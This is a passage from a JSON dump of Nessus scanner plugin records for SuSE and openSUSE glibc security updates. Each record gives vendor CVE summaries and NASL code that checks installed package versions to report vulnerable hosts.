reference:\"2.7-18lenny4\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libc6.1-prof\", reference:\"2.7-18lenny4\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"locales\", reference:\"2.7-18lenny4\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"locales-all\", reference:\"2.7-18lenny4\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"nscd\", reference:\"2.7-18lenny4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T14:02:33", "description": "Several security issues were fixed :\n\n - Integer overflow causing arbitrary code execution in\n ld.so --verify mode could be induced by a specially\n crafted binary. (CVE-2010-0830)\n\n - The addmntent() function would not escape the newline\n character properly, allowing the user to insert\n arbitrary newlines to the /etc/mtab; if the addmntent()\n is run by a setuid mount binary that does not do extra\n input checking, this would allow custom entries to be\n inserted in /etc/mtab. (CVE-2010-0296)\n\n - The strfmon() function contains an integer overflow\n vulnerability in width specifiers handling that could be\n triggered by an attacker that can control the format\n string passed to strfmon(). (CVE-2008-1391)\n\nAlso one non-security issue was fixed: - nscd in the paranoia mode\nwould crash on the periodic restart in case one of the databases was\ndisabled in the nscd configuration.\n\nIn addition, the timezone information was updated to the level of\n2010l, including the following changes :\n\n - Africa/Cairo (Egypt) and Asia/Gaza (Palestine) do not\n use daylight saving during the month of Ramadan in order\n to prevent Muslims from fasting one hour longer.\n http://www.timeanddate.com/news/time/egypt-ends-dst-2010\n .html\n http://www.timeanddate.com/news/time/westbank-gaza-end-d\n st-2010.html\n\n - Africa/Casablanca (Marocco) has spent the period from\n May 2 to Aug 8 using daylight saving. Marocco adopted\n regular daylight saving, but the start and end dates\n vary every year.\n http://www.timeanddate.com/news/time/morocco-starts-dst-\n 2010.html\n\n - America/Argentina/San_Luis (Argentina region) local\n government did not terminate its DST period as planned\n and instead decided to extend its use of the UTC-3 time\n indefinitely.\n http://www.worldtimezone.com/dst_news/dst_news_argentina\n 08.html\n\nNew zones :\n\n - America/Bahia_Banderas (Mexican state of Nayarit) has\n declared that it is to follow the UCT-6 time instead of\n UCT-7, with the aim to have the same time as the nearby\n city of Puerto Vallarta.\n http://www.worldtimezone.com/dst_news/dst_news_mexico08.\n html\n\nHistorical changes :\n\n - Asia/Taipei information on DST usage listed 1980 as one\n year using DST, which should read 1979 instead according\n to government resources.\n\n - Europe/Helsinki, before switching to Central European\n standard DST in 1983, trialled DST for two years.\n However, the database omitted to specify that in these\n trials of 1981 and 1982, switches have been made one\n hour earlier than in 1983.\n\nSpelling changes in Micronesia: - Pacific/Truk has been renamed to\nPacific/Chuuk in 1989. - Pacific/Ponape has been renamed to\nPacific/Pohnpei in 1984.", "edition": 23, "published": "2010-10-06T00:00:00", "title": "SuSE9 Security Update : glibc (YOU Patch Number 12641)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0296", "CVE-2010-0830", "CVE-2008-1391"], "modified": "2010-10-06T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE9_12641.NASL", "href": "https://www.tenable.com/plugins/nessus/49758", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(49758);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-1391\", \"CVE-2010-0296\", \"CVE-2010-0830\");\n\n script_name(english:\"SuSE9 Security Update : glibc (YOU Patch Number 12641)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 9 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several security issues were fixed :\n\n - Integer overflow causing arbitrary code execution in\n ld.so --verify mode could be induced by a specially\n crafted binary. (CVE-2010-0830)\n\n - The addmntent() function would not escape the newline\n character properly, allowing the user to insert\n arbitrary newlines to the /etc/mtab; if the addmntent()\n is run by a setuid mount binary that does not do extra\n input checking, this would allow custom entries to be\n inserted in /etc/mtab. (CVE-2010-0296)\n\n - The strfmon() function contains an integer overflow\n vulnerability in width specifiers handling that could be\n triggered by an attacker that can control the format\n string passed to strfmon(). (CVE-2008-1391)\n\nAlso one non-security issue was fixed: - nscd in the paranoia mode\nwould crash on the periodic restart in case one of the databases was\ndisabled in the nscd configuration.\n\nIn addition, the timezone information was updated to the level of\n2010l, including the following changes :\n\n - Africa/Cairo (Egypt) and Asia/Gaza (Palestine) do not\n use daylight saving during the month of Ramadan in order\n to prevent Muslims from fasting one hour longer.\n http://www.timeanddate.com/news/time/egypt-ends-dst-2010\n .html\n http://www.timeanddate.com/news/time/westbank-gaza-end-d\n st-2010.html\n\n - Africa/Casablanca (Marocco) has spent the period from\n May 2 to Aug 8 using daylight saving. Marocco adopted\n regular daylight saving, but the start and end dates\n vary every year.\n http://www.timeanddate.com/news/time/morocco-starts-dst-\n 2010.html\n\n - America/Argentina/San_Luis (Argentina region) local\n government did not terminate its DST period as planned\n and instead decided to extend its use of the UTC-3 time\n indefinitely.\n http://www.worldtimezone.com/dst_news/dst_news_argentina\n 08.html\n\nNew zones :\n\n - America/Bahia_Banderas (Mexican state of Nayarit) has\n declared that it is to follow the UCT-6 time instead of\n UCT-7, with the aim to have the same time as the nearby\n city of Puerto Vallarta.\n http://www.worldtimezone.com/dst_news/dst_news_mexico08.\n html\n\nHistorical changes :\n\n - Asia/Taipei information on DST usage listed 1980 as one\n year using DST, which should read 1979 instead according\n to government resources.\n\n - Europe/Helsinki, before switching to Central European\n standard DST in 1983, trialled DST for two years.\n However, the database omitted to specify that in these\n trials of 1981 and 1982, switches have been made one\n hour earlier than in 1983.\n\nSpelling changes in Micronesia: - Pacific/Truk has been renamed to\nPacific/Chuuk in 1989. - Pacific/Ponape has been renamed to\nPacific/Pohnpei in 1984.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-1391.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-0296.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-0830.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply YOU patch number 12641.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cwe_id(189);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/08/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/10/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 9 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SUSE9\", reference:\"glibc-2.3.3-98.114\")) flag++;\nif (rpm_check(release:\"SUSE9\", reference:\"glibc-devel-2.3.3-98.114\")) flag++;\nif (rpm_check(release:\"SUSE9\", reference:\"glibc-html-2.3.3-98.114\")) flag++;\nif (rpm_check(release:\"SUSE9\", reference:\"glibc-i18ndata-2.3.3-98.114\")) flag++;\nif (rpm_check(release:\"SUSE9\", reference:\"glibc-info-2.3.3-98.114\")) flag++;\nif (rpm_check(release:\"SUSE9\", reference:\"glibc-locale-2.3.3-98.114\")) flag++;\nif (rpm_check(release:\"SUSE9\", reference:\"glibc-profile-2.3.3-98.114\")) flag++;\nif (rpm_check(release:\"SUSE9\", reference:\"nscd-2.3.3-98.114\")) flag++;\nif (rpm_check(release:\"SUSE9\", reference:\"timezone-2.3.3-98.114\")) flag++;\nif (rpm_check(release:\"SUSE9\", cpu:\"x86_64\", reference:\"glibc-32bit-9-201008251911\")) flag++;\nif (rpm_check(release:\"SUSE9\", cpu:\"x86_64\", reference:\"glibc-devel-32bit-9-201008251304\")) flag++;\nif (rpm_check(release:\"SUSE9\", cpu:\"x86_64\", reference:\"glibc-locale-32bit-9-201008251304\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T14:04:20", "description": "This update of glibc fixes various bugs and security issues :\n\nCVE-2010-3847: Decoding of the $ORIGIN special value in various LD_\nenvironment variables allowed local attackers to execute code in\ncontext of e.g. setuid root programs, elevating privileges. This issue\ndoes not affect SUSE as an assertion triggers before the respective\ncode is executed. The bug was fixed nevertheless.\n\nCVE-2010-3856: The LD_AUDIT environment was not pruned during setuid\nroot execution and could load shared libraries from standard system\nlibrary paths. This could be used by local attackers to inject code\ninto setuid root programs and so elevated privileges.\n\nCVE-2010-0830: Integer overflow causing arbitrary code execution in\nld.so\n\n--verify mode could be induced by a specially crafted binary.\n\nCVE-2010-0296: The addmntent() function would not escape the newline\ncharacter properly, allowing the user to insert arbitrary newlines to\nthe /etc/mtab; if the addmntent() is run by a setuid mount binary that\ndoes not do extra input checking, this would allow custom entries to\nbe inserted in /etc/mtab.\n\nCVE-2008-1391: The strfmon() function contains an integer overflow\nvulnerability in width specifiers handling that could be triggered by\nan attacker that can control the format string passed to strfmon().\n\nCVE-2010-0015: Some setups (mainly Solaris-based legacy setups)\ninclude shadow information (password hashes) as so-called 'adjunct\npasswd' table, mangling it with the rest of passwd columns instead of\nkeeping it in the shadow table. Normally, Solaris will disclose this\ninformation only to clients bound to a priviledged port, but when nscd\nis deployed on the client, getpwnam() would disclose the password\nhashes to all users. New mode 'adjunct as shadow' can now be enabled\nin /etc/default/nss that will move the password hashes from the\nworld-readable passwd table to emulated shadow table (that is not\ncached by nscd).\n\nSome invalid behaviour, crashes and memory leaks were fixed :\n\n - statfs64() would not function properly on IA64 in ia32el\n emulation mode.\n\n - memcpy() and memset() on power6 would erroneously use a\n 64-bit instruction within 32-bit code in certain corner\n cases.\n\n - nscd would not load /etc/host.conf properly before\n performing host resolution - most importantly, `multi\n on` in /etc/host.conf would be ignored when nscd was\n used, breaking e.g. resolving records in /etc/hosts\n where single name would point at multiple addresses\n\n - Removed mapping from lowercase sharp s to uppercase\n sharp S; uppercase S is not a standardly used letter and\n causes problems for ISO encodings.\n\nSome other minor issues were fixed :\n\n - glibc-locale now better coexists with sap-locale on\n upgrades by regenerating the locale/gconv indexes\n properly.\n\n - Ports 623 and 664 may not be allocated by RPC code\n automatically anymore since that may clash with ports\n used on some IPMI network cards.\n\n - On x86_64, backtrace of a static destructor would stop\n in the _fini() glibc pseudo-routine, making it difficult\n to find out what originally triggered the program\n termination. The routine now has unwind information\n attached.", "edition": 27, "published": "2010-10-28T00:00:00", "title": "openSUSE Security Update : glibc (openSUSE-SU-2010:0914-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0015", "CVE-2010-0296", "CVE-2010-0830", "CVE-2010-3856", "CVE-2010-3847", "CVE-2008-1391"], "modified": "2010-10-28T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:glibc-devel", "p-cpe:/a:novell:opensuse:glibc-profile-32bit", "p-cpe:/a:novell:opensuse:glibc-profile", "p-cpe:/a:novell:opensuse:glibc", "p-cpe:/a:novell:opensuse:glibc-obsolete", "p-cpe:/a:novell:opensuse:glibc-info", "p-cpe:/a:novell:opensuse:glibc-32bit", "p-cpe:/a:novell:opensuse:glibc-devel-32bit", "cpe:/o:novell:opensuse:11.1", "p-cpe:/a:novell:opensuse:glibc-locale-32bit", "p-cpe:/a:novell:opensuse:glibc-locale", "p-cpe:/a:novell:opensuse:glibc-html", "p-cpe:/a:novell:opensuse:nscd", "p-cpe:/a:novell:opensuse:glibc-i18ndata"], "id": "SUSE_11_1_GLIBC-101026.NASL", "href": "https://www.tenable.com/plugins/nessus/50367", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update glibc-3399.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(50367);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-1391\", \"CVE-2010-0015\", \"CVE-2010-0296\", \"CVE-2010-0830\", \"CVE-2010-3847\", \"CVE-2010-3856\");\n\n script_name(english:\"openSUSE Security Update : glibc (openSUSE-SU-2010:0914-1)\");\n script_summary(english:\"Check for the glibc-3399 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update of glibc fixes various bugs and security issues :\n\nCVE-2010-3847: Decoding of the $ORIGIN special value in various LD_\nenvironment variables allowed local attackers to execute code in\ncontext of e.g. setuid root programs, elevating privileges. This issue\ndoes not affect SUSE as an assertion triggers before the respective\ncode is executed. The bug was fixed nevertheless.\n\nCVE-2010-3856: The LD_AUDIT environment was not pruned during setuid\nroot execution and could load shared libraries from standard system\nlibrary paths. This could be used by local attackers to inject code\ninto setuid root programs and so elevated privileges.\n\nCVE-2010-0830: Integer overflow causing arbitrary code execution in\nld.so\n\n--verify mode could be induced by a specially crafted binary.\n\nCVE-2010-0296: The addmntent() function would not escape the newline\ncharacter properly, allowing the user to insert arbitrary newlines to\nthe /etc/mtab; if the addmntent() is run by a setuid mount binary that\ndoes not do extra input checking, this would allow custom entries to\nbe inserted in /etc/mtab.\n\nCVE-2008-1391: The strfmon() function contains an integer overflow\nvulnerability in width specifiers handling that could be triggered by\nan attacker that can control the format string passed to strfmon().\n\nCVE-2010-0015: Some setups (mainly Solaris-based legacy setups)\ninclude shadow information (password hashes) as so-called 'adjunct\npasswd' table, mangling it with the rest of passwd columns instead of\nkeeping it in the shadow table. Normally, Solaris will disclose this\ninformation only to clients bound to a priviledged port, but when nscd\nis deployed on the client, getpwnam() would disclose the password\nhashes to all users. New mode 'adjunct as shadow' can now be enabled\nin /etc/default/nss that will move the password hashes from the\nworld-readable passwd table to emulated shadow table (that is not\ncached by nscd).\n\nSome invalid behaviour, crashes and memory leaks were fixed :\n\n - statfs64() would not function properly on IA64 in ia32el\n emulation mode.\n\n - memcpy() and memset() on power6 would erroneously use a\n 64-bit instruction within 32-bit code in certain corner\n cases.\n\n - nscd would not load /etc/host.conf properly before\n performing host resolution - most importantly, `multi\n on` in /etc/host.conf would be ignored when nscd was\n used, breaking e.g. resolving records in /etc/hosts\n where single name would point at multiple addresses\n\n - Removed mapping from lowercase sharp s to uppercase\n sharp S; uppercase S is not a standardly used letter and\n causes problems for ISO encodings.\n\nSome other minor issues were fixed :\n\n - glibc-locale now better coexists with sap-locale on\n upgrades by regenerating the locale/gconv indexes\n properly.\n\n - Ports 623 and 664 may not be allocated by RPC code\n automatically anymore since that may clash with ports\n used on some IPMI network cards.\n\n - On x86_64, backtrace of a static destructor would stop\n in the _fini() glibc pseudo-routine, making it difficult\n to find out what originally triggered the program\n termination. The routine now has unwind information\n attached.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=375315\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=445636\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=513961\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=534828\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=537315\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=538067\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=541773\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=569091\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=572188\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=585879\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=592941\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=594263\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=615556\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=646960\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2010-10/msg00041.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected glibc packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'glibc LD_AUDIT Arbitrary DSO Load Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(189, 255);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-i18ndata\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-info\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-locale\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-locale-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-obsolete\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-profile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-profile-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/10/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/10/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.1\", reference:\"glibc-2.9-2.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"glibc-devel-2.9-2.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"glibc-html-2.9-2.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"glibc-i18ndata-2.9-2.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"glibc-info-2.9-2.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"glibc-locale-2.9-2.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"glibc-obsolete-2.9-2.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"glibc-profile-2.9-2.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"nscd-2.9-2.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", cpu:\"x86_64\", reference:\"glibc-32bit-2.9-2.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", cpu:\"x86_64\", reference:\"glibc-devel-32bit-2.9-2.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", cpu:\"x86_64\", reference:\"glibc-locale-32bit-2.9-2.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", cpu:\"x86_64\", reference:\"glibc-profile-32bit-2.9-2.13.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T14:10:56", "description": "This update of glibc fixes various bugs and security issues :\n\n - Decoding of the $ORIGIN special value in various LD_\n environment variables allowed local attackers to execute\n code in context of e.g. setuid root programs, elevating\n privileges. This issue does not affect SUSE as an\n assertion triggers before the respective code is\n executed. The bug was fixed nevertheless.\n (CVE-2010-3847)\n\n - The LD_AUDIT environment was not pruned during setuid\n root execution and could load shared libraries from\n standard system library paths. This could be used by\n local attackers to inject code into setuid root programs\n and so elevated privileges. (CVE-2010-3856)\n\n - Integer overflow causing arbitrary code execution in\n ld.so --verify mode could be induced by a specially\n crafted binary. (CVE-2010-0830)\n\n - The addmntent() function would not escape the newline\n character properly, allowing the user to insert\n arbitrary newlines to the /etc/mtab; if the addmntent()\n is run by a setuid mount binary that does not do extra\n input checking, this would allow custom entries to be\n inserted in /etc/mtab. (CVE-2010-0296)\n\n - The strfmon() function contains an integer overflow\n vulnerability in width specifiers handling that could be\n triggered by an attacker that can control the format\n string passed to strfmon(). (CVE-2008-1391)\n\n - Some setups (mainly Solaris-based legacy setups) include\n shadow information (password hashes) as so-called\n 'adjunct passwd' table, mangling it with the rest of\n passwd columns instead of keeping it in the shadow\n table. Normally, Solaris will disclose this information\n only to clients bound to a priviledged port, but when\n nscd is deployed on the client, getpwnam() would\n disclose the password hashes to all users. New mode\n 'adjunct as shadow' can now be enabled in\n /etc/default/nss that will move the password hashes from\n the world-readable passwd table to emulated shadow table\n (that is not cached by nscd). (CVE-2010-0015)\n\nSome invalid behaviour, crashes and memory leaks were fixed :\n\n - statfs64() would not function properly on IA64 in ia32el\n emulation mode.\n\n - memcpy() and memset() on power6 would erroneously use a\n 64-bit instruction within 32-bit code in certain corner\n cases.\n\n - nscd would not load /etc/host.conf properly before\n performing host resolution - most importantly, multi on\n in /etc/host.conf would be ignored when nscd was used,\n breaking e.g. resolving records in /etc/hosts where\n single name would point at multiple addresses\n\n - Removed mapping from lowercase sharp s to uppercase\n sharp S; uppercase S is not a standardly used letter and\n causes problems for ISO encodings.\n\nSome other minor issues were fixed :\n\n - glibc-locale now better coexists with sap-locale on\n upgrades by regenerating the locale/gconv indexes\n properly.\n\n - Ports 623 and 664 may not be allocated by RPC code\n automatically anymore since that may clash with ports\n used on some IPMI network cards.\n\n - On x86_64, backtrace of a static destructor would stop\n in the _fini() glibc pseudo-routine, making it difficult\n to find out what originally triggered the program\n termination. The routine now has unwind information\n attached.", "edition": 26, "published": "2010-12-02T00:00:00", "title": "SuSE 11 / 11.1 Security Update : glibc (SAT Patch Numbers 3392 / 3393)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0015", "CVE-2010-0296", "CVE-2010-0830", "CVE-2010-3856", "CVE-2010-3847", "CVE-2008-1391"], "modified": "2010-12-02T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:glibc-profile", "p-cpe:/a:novell:suse_linux:11:glibc-devel-32bit", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:glibc-info", "p-cpe:/a:novell:suse_linux:11:glibc-html", "p-cpe:/a:novell:suse_linux:11:glibc-i18ndata", "p-cpe:/a:novell:suse_linux:11:glibc", "p-cpe:/a:novell:suse_linux:11:glibc-32bit", "p-cpe:/a:novell:suse_linux:11:glibc-locale-32bit", "p-cpe:/a:novell:suse_linux:11:glibc-devel", "p-cpe:/a:novell:suse_linux:11:glibc-profile-32bit", "p-cpe:/a:novell:suse_linux:11:nscd", "p-cpe:/a:novell:suse_linux:11:glibc-locale"], "id": "SUSE_11_GLIBC-101025.NASL", "href": "https://www.tenable.com/plugins/nessus/50912", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(50912);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-1391\", \"CVE-2010-0015\", \"CVE-2010-0296\", \"CVE-2010-0830\", \"CVE-2010-3847\", \"CVE-2010-3856\");\n\n script_name(english:\"SuSE 11 / 11.1 Security Update : glibc (SAT Patch Numbers 3392 / 3393)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update of glibc fixes various bugs and security issues :\n\n - Decoding of the $ORIGIN special value in various LD_\n environment variables allowed local attackers to execute\n code in context of e.g. setuid root programs, elevating\n privileges. This issue does not affect SUSE as an\n assertion triggers before the respective code is\n executed. The bug was fixed nevertheless.\n (CVE-2010-3847)\n\n - The LD_AUDIT environment was not pruned during setuid\n root execution and could load shared libraries from\n standard system library paths. This could be used by\n local attackers to inject code into setuid root programs\n and so elevated privileges. (CVE-2010-3856)\n\n - Integer overflow causing arbitrary code execution in\n ld.so --verify mode could be induced by a specially\n crafted binary. (CVE-2010-0830)\n\n - The addmntent() function would not escape the newline\n character properly, allowing the user to insert\n arbitrary newlines to the /etc/mtab; if the addmntent()\n is run by a setuid mount binary that does not do extra\n input checking, this would allow custom entries to be\n inserted in /etc/mtab. (CVE-2010-0296)\n\n - The strfmon() function contains an integer overflow\n vulnerability in width specifiers handling that could be\n triggered by an attacker that can control the format\n string passed to strfmon(). (CVE-2008-1391)\n\n - Some setups (mainly Solaris-based legacy setups) include\n shadow information (password hashes) as so-called\n 'adjunct passwd' table, mangling it 